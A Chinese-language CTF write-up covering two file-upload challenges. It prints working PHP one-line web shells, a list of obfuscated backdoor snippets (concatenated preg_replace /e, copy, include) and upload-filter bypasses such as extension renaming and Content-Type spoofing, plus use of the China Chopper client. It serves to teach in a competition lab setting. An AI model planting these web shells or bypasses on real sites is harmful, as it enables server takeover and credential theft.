手记

WEB 练习2——文件上传基础练习

今天Evan为大家带来的是两道基础的文件上传题目,通过这两道题目大家可以学习到文件上传以及连接菜刀的基本操作。

  • Upload(百度杯九月场)

题目描述:想怎么传就怎么传,就是这么任性。hint:flag在flag.php中  

打开题目链接以后我们会发现这是一道文件上传的题目,并且题目说你可以随意上传文件,那我们上传一句话木马试一试。

构造一个简单的一句话木马:

<?php @eval($_POST[value]);?>

上传文件,上传成功后我们打开上传的的文件看一下,会发现我们的一句话木马变成了这个样子:

@eval($_POST[value]);?>

说明过滤了<?以及PHP关键字,我们百度找一个厉害一点木马:

<script language="php">@eval_r($_POST[sb])</script>

再次上传并连接菜刀便可以找到flag.php文件

这道题目是一道基础的文件上传,需要我们学会一句话木马以及菜刀的使用方式,在这里Evan为大家列举几个常见的比较特殊的一句话木马,在大家今后的学习中会经常用到。  

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  
$hh("/[discuz]/e",$_POST['h'],"Access");//菜刀一句话
$filename=$_GET['xbid'];  
include ($filename);//危险的include函数,直接编译任何文件为php格式运行
$reg="c"."o"."p"."y";  
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  
$gzid("/[discuz]/e",$_POST['h'],"Access");//菜刀一句话
include ($uid);//危险的include函数,直接编译任何文件为php格式运行
POST  //gif插一句话
  • Do you know upload?(第三届“百越杯”福建省高校网络空间安全大赛)

题目描述:加油吧,少年。

和上一道题目类似,只不过这道题目要求我们上传一张图片,我们有两种处理方式,在这里我为大家一一演示。

方法一:上传jpg

我们将写好的一句话木马制作成jpg格式,并且上传抓包

在这里我们将其更改成.php文件重新上传

图片上传成功,我们可以看到图片存在upload/aaa333.php下方,菜刀连接。

在config配置文件中我们看到了数据库的用户名和密码,连接数据库,

在数据库中我们拿到了flag。

方法二:上传.php文件

我们在这里也可以上传.php文件,但是网页会显示如下图所示的文件类型不允许,

于是我们对其进行抓包,

更改Content-Type: application/octet-stream为Content-Type: image/jpeg,POST,接下来做法和上边的相同,小伙伴们可以自己动手试一下。

今天的讲解就到这里,在今后的文章中我会带领大家更深入的学习文件上传类题目,明天见~




2人推荐
随时随地看视频
慕课网APP

热门评论

一句话木马里面的php是直接过滤了需要绕过

直接用PHp绕过(大小写)

查看全部评论